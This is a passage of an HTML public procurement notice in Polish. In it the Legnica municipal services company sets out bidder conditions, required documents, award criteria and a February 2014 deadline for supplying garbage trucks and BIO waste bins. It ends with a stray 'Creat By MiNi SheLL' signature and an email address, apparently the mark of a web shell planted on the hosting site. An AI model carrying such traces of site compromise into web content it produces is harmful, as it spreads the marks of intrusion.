Wykonawca spełnia warunek, jeżeli dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia (w przypadku wspólnego ubiegania się przez dwóch lub więcej Wykonawców w/w warunek może być spełniony łącznie).
Ocena spełnienia w/w warunku w postępowaniu dokonana zostanie na podstawie złożonego oświadczenia, według zapisów punktu VII.1.1). SIWZ stanowiącego załącznik nr 3.Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Wykonawca spełnia warunek, jeżeli dysponuje osobami zdolnymi do wykonania zamówienia (w przypadku wspólnego ubiegania się przez dwóch lub więcej Wykonawców w/w warunek może być spełniony łącznie).
Ocena spełnienia w/w warunku w postępowaniu dokonana zostanie na podstawie złożonego oświadczenia, według zapisów punktu VII.1.1). SIWZ stanowiącego załącznik nr 3. Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Wykonawca spełnia warunek, jeżeli znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (w przypadku wspólnego ubiegania się przez dwóch lub więcej Wykonawców w/w warunek może być spełniony łącznie).
 Ocena spełniania w/w warunku udziału w postępowaniu dokonana zostanie na podstawie złożonego oświadczenia, według zapisów punktu VII.1.1) SIWZ stanowiącego załącznik nr 3. 
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać się 2 (dwiema) dostawami fabrycznie nowych śmieciarek oraz 1 (jedną) dostawą fabrycznie nowych pojemników na odpady BIO w ilości nie mniejszej niż 300szt. w ramach jednej umowy.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Opis przedmiotu zamówienia według Załącznika nr 1 do SIWZ
2.Formularz ofertowy sporządzony według Załącznika nr 2 do SIWZ
3.W stosunku do osób fizycznych- oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy Pzp według Załącznika nr 4a do SIWZ
4.Wykaz części zamówienia, których wykonanie zostanie powierzone Podwykonawcom przy wykonywaniu zamówienia według załącznika nr 6 do SIWZ
5.Dowód opłacenia/ wniesienia wadium
6.Pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu tego podmiotu według załącznika nr 8 do SIWZ.
7.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy załączyć pełnomocnictwo. W pełnomocnictwie Wykonawcy ustanowią i wskażą Zamawiającemu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo będzie podpisane przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawców zgodnie z dokumentami rejestrowymi.
W przypadku niezgodności wpisu ze stanem faktycznym Wykonawcy, każdy Wykonawca musi złożyć dokumenty sporządzone przez jego właściwy organ, a uprawniający daną osobę lub osoby do reprezentowania Wykonawcy i podpisywania oświadczeń w imieniu Wykonawców. 
8.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia Umowy w sprawie niniejszego zamówienia publicznego (należy załączyć oryginał lub kserokopię poświadczoną za zgodność z oryginałem przez osoby upoważnione do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)w przypadku wystąpienia siły wyższej, czyli zdarzenia, którego nie można było przewidzieć. Wówczas maksymalny okres przesunięcia terminu zakończenia umowy będzie równy okresowi przerwy w realizacji. Siła wyższa, to zdarzenie zewnętrzne o obiektywnie małym stopniu prawdopodobieństwa pojawienia się zdarzenia w określonej sytuacji, a którego szkodliwe następstwo przy zastosowaniu współczesnej techniki uniemożliwia Wykonawcy wykonywanie w części lub całości jego zobowiązań,
2)w przypadku zmiany osób reprezentujących Zamawiającego/ Wykonawcę w przypadku zmian organizacyjnych lub wynikłych z przyczyn losowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lpgk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o.,ul. Nowodworska 60, 59-220 Legnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2014 godzina 09:00, miejsce: Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o., ul. Nowodworska 60, 59-220 Legnica, sekretariat, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com